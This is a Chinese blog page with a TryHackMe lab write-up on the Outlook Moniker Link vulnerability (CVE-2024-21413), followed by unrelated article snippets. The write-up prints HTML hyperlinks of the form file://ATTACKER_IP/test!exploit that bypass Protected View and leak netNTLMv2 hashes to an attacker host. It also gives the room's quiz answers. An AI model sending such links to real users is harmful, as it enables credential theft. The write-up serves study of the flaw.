news 2026/6/25 20:54:44

深度剖析Outlook高危漏洞CVE-2024–21413:Moniker Link的利用与防御

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
深度剖析Outlook高危漏洞CVE-2024–21413:Moniker Link的利用与防御

Tryhackme — Moniker Link (CVE-2024–21413)

任务 1 — 简介
2024年2月13日,微软公布了一个Microsoft Outlook远程代码执行(RCE)及凭证泄露漏洞,分配的CVE编号为CVE-2024–21413(Moniker Link)。Check Point Research的Haifei Li被确认发现了此漏洞。

该漏洞在处理一种称为“Moniker Link”的特殊超链接时,绕过了Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦受害者点击该超链接,就会导致Outlook将用户的NTLM凭证发送给攻击者。

回答以下问题:
该CVE被分配的“严重性”等级是什么?
= 严重

任务 2 — Moniker Link (CVE-2024–21413)
通过在超链接中使用file://类型的Moniker Link,我们可以指示Outlook尝试访问一个文件,例如网络共享上的文件(<a href="file://ATTACKER_IP/test">Click me</a>)。此过程使用SMB协议,该协议会使用本地凭证进行身份验证。然而,Outlook的“受保护的视图”功能会捕获并阻止此尝试。

<p><a href="file://ATTACKER_MACHINE/test">Click me</a></p>

此处的漏洞在于,修改我们的超链接,在Moniker Link中包含!特殊字符和一些文本,从而绕过Outlook的“受保护的视图”。例如:
<a href="file://ATTACKER_IP/test!exploit">Click me</a>.

<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

作为攻击者,我们可以提供这种性质的Moniker Link进行攻击。请注意,远程设备上并不需要实际存在该共享,因为无论如何都会尝试进行身份验证,从而导致受害者的Windows netNTLMv2哈希值被发送给攻击者。

远程代码执行是可能的,因为Moniker Link在Windows上使用了组件对象模型。不过,对此进行解释目前超出了本房间的范围,因为尚未有公开发布的通过此特定CVE实现RCE的概念验证。

回答以下问题:
我们在超链接中使用哪种Moniker Link类型?
= file://
用于绕过Outlook“受保护的视图”的特殊字符是什么?
= !

任务 3 — 利用
数据: https://tryhackme.com/room/monikerlink

概念验证:

  • 需要攻击者和受害者的电子邮件。通常,你需要使用自己的SMTP服务器(本房间已为你提供)。
  • 需要密码进行身份验证。在本房间中,attacker@monikerlink.thm的密码是attacker
  • 包含电子邮件内容 (html_content),其中包含我们作为HTML超链接的Moniker Link。
  • 然后,填写电子邮件中的“主题”、“发件人”和“收件人”字段。
  • 最后,将电子邮件发送到邮件服务器。

我们在AttackBox上用来捕获用户哈希的应用程序名称是什么?
= responder
点击电子邮件中的超链接后捕获的哈希类型是什么?
= netNTLMv2

其他任务涉及新的Outlook更新,如果不看答案,你可能无法完成房间,因此答案已在任务本身中给出。

这是我的学习总结,希望对你有帮助,别忘了关注。FINISHED
CSD0tFqvECLokhw9aBeRqm5orB3AsHVzWqw5nASLxH9NbQfXT2bQPYZThKYCe4Jv48TgTN9cT+sa7UDoads3y/guN6+Q4S1LWPV/MKeUL/p6w4ps0bEExAdq59YOidx2
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/20 23:57:53

Codeforces Round 1078 (Div. 2) A,B,C,D,E,F1个人题解

A. 割草机数学每个测试时间限制&#xff1a;1秒 每个测试内存限制&#xff1a;256兆字节 夏季别墅的出口由一道栅栏围成&#xff0c;栅栏由 \(n\) 块木板组成&#xff0c;每块木板宽 \(1\) 米。出口的左右两侧是其他地块的栅栏。为了建造浴室&#xff0c;需要移除栅栏中的一些木…

作者头像 李华
网站建设 2026/6/21 14:35:03

【Django毕设源码分享】基于Django的共享咖啡机运维故障报修系统的设计与实现(程序+文档+代码讲解+一条龙定制)

博主介绍&#xff1a;✌️码农一枚 &#xff0c;专注于大学生项目实战开发、讲解和毕业&#x1f6a2;文撰写修改等。全栈领域优质创作者&#xff0c;博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围&#xff1a;&am…

作者头像 李华
网站建设 2026/6/14 2:17:26

基于大数据技术的港口物流数据分析及可视化的设计与实现

目录大数据技术在港口物流中的应用背景港口物流数据分析的核心目标关键技术方法系统实现与效果未来研究方向项目技术支持可定制开发之功能亮点源码获取详细视频演示 &#xff1a;文章底部获取博主联系方式&#xff01;同行可合作大数据技术在港口物流中的应用背景 港口物流涉及…

作者头像 李华
网站建设 2026/6/26 2:12:37

springboot二手车交易市场管理系统vue

目录系统概述核心功能模块技术栈亮点扩展性设计部署与维护项目技术支持可定制开发之功能亮点源码获取详细视频演示 &#xff1a;文章底部获取博主联系方式&#xff01;同行可合作系统概述 SpringBoot与Vue.js结合的二手车交易市场管理系统是一个前后端分离的Web应用&#xff0…

作者头像 李华
网站建设 2026/6/22 5:05:50

为什么有些工厂越做越小?问题出在沟通上

不少工厂设备并不差、技术也不弱&#xff0c;然而订单却一年比一年少&#xff0c;客户也在不断流失&#xff0c;从表面上看是市场竞争激烈、价格低&#xff0c;其实事实上&#xff0c;根源在于“沟通失效”&#xff0c;对内协作出现断层&#xff0c;对外表达存在错位&#xff0…

作者头像 李华